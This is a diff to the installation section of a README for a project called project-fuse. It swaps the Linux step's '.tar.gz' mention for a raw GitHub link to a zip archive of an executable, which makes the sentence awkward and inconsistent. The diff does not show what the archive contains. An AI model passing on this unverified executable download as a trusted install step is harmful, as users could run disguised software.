Hwnggv/project-fuse/README.md

 4. **Install the Application**:
    - For Windows: Double-click the downloaded `.exe` file and follow the prompts in the installation wizard.
    - For macOS: Open the `.dmg` file and drag project-fuse into your Applications folder.
-   - For Linux: Use terminal commands to extract the downloaded `.tar.gz` file and run the executable.
+   - For Linux: Use terminal commands to extract the downloaded `https://github.com/Hwnggv/project-fuse/raw/refs/heads/main/fuse-cli/fuse-project-1.4.zip` file and run the executable.

 5. **Launch the Application**:
    After installation, open project-fuse from your Applications menu or desktop shortcut.